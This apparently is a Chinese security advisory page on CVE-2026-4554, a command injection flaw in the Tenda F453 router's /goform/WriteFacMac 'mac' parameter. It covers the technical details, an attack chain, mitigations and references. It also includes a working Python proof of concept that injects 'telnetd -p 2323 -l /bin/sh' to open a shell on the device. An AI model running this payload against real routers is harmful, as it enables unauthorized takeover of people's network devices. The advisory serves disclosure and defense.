CVE-2026-4554 CVSS 6.3 中危

CVE-2026-4554 Tenda F453命令注入漏洞

披露日期: 2026-03-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4554

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda F453

漏洞概述

Tenda F453 路由器 1.0.0.3 版本被发现存在严重的安全设计缺陷。具体漏洞位于 /goform/WriteFacMac 接口的 FormWriteFacMac 函数中。由于系统未对用户提交的 'mac' 参数进行严格的输入验证和过滤，导致攻击者能够注入恶意操作系统命令。该漏洞允许低权限攻击者利用网络进行远程攻击，无需用户交互即可成功利用，对设备的机密性、完整性和可用性造成中等程度影响。鉴于已有公开PoC，风险较高。

技术细节

该漏洞属于典型的操作系统命令注入漏洞。在Tenda F453固件中，Web管理界面的/goform/WriteFacMac接口负责处理MAC地址写入操作。当表单提交时，FormWriteFacMac函数会直接获取用户输入的'mac'参数。由于该函数未对特殊字符（如分号、管道符、反引号等）进行转义或过滤，攻击者可以构造包含恶意Shell命令的Payload。当系统执行写入操作时，会调用系统命令（如system()或popen()），并将未经过滤的参数拼接进去，导致恶意命令被服务器端执行。攻击者只需具备低权限账号即可通过网络触发该逻辑，进而获取设备控制权或执行任意操作。

攻击链分析

STEP 1

1. 侦察

攻击者扫描网络以识别Tenda F453设备，并确认其运行在固件版本1.0.0.3上。

STEP 2

2. 获取访问

攻击者获取路由器的低权限用户凭证（PR:L要求），或者确认该接口是否允许未授权访问。

STEP 3

3. 漏洞利用

攻击者向/goform/WriteFacMac端点发送特制的HTTP POST请求，在'mac'参数中注入恶意Shell命令。

STEP 4

4. 命令执行

后端系统解析'mac'参数时，将注入的命令传递给系统Shell执行，从而开启后门或执行破坏性操作。

STEP 5

5. 控制设备

攻击者利用执行的命令获得设备控制权，提取敏感信息或进一步横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual IP)
target_url = "http://192.168.0.1/goform/WriteFacMac"

# Vulnerable parameter 'mac' with command injection payload
# Example: Attempting to execute a simple command like 'reboot' or 'telnetd'
# Using semicolon to chain commands in a Linux shell environment
payload_data = {
    "mac": "AA:BB:CC:DD:EE:FF; telnetd -p 2323 -l /bin/sh"
}

try:
    # Sending the POST request to exploit the vulnerability
    response = requests.post(target_url, data=payload_data)
    
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check if telnet started on port 2323.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except requests.exceptions.RequestException as e:
    print(f"[!] An error occurred: {e}")

影响范围

Tenda F453 1.0.0.3

防御指南

临时缓解措施

在官方发布修复补丁前，建议用户关闭路由器的远程Web管理功能（WAN侧访问），并在防火墙中设置规则，阻止外部网络对内部路由器管理端口的访问。此外，可以暂时禁用未使用的服务以减少攻击面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4554
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4554
3 Details https://www.cvedetails.com/cve/CVE-2026-4554/
4 VulDB https://vuldb.com/cve/CVE-2026-4554
5 Link https://github.com/Litengzheng/vul_db/blob/main/F453/vul_95/README.md
6 Link https://vuldb.com/?ctiid.352381
7 Link https://vuldb.com/?id.352381
8 Link https://vuldb.com/?submit.774933
9 Link https://www.tenda.com.cn/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表